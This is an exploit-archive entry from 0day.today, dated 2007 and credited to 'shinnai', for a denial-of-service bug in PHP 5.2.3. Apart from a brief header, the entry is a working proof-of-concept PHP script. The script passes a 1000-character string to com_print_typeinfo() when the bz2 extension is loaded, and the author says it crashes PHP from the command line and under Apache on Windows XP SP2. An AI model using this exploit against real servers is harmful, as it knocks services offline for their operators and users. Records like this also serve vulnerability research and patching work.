PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit

2007-07-12T00:00:00
ID 1337DAY-ID-6421
Type zdt
Reporter shinnai
Modified 2007-07-12T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            ============================================================
PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit
============================================================





<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp sp2, worked both from the cli and on apache

//Bug discovered with "Footzo" (thanks to rgod).


if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}

$buff = str_repeat("a",1000);

com_print_typeinfo($buff);

?>



#  0day.today [2018-03-12]  #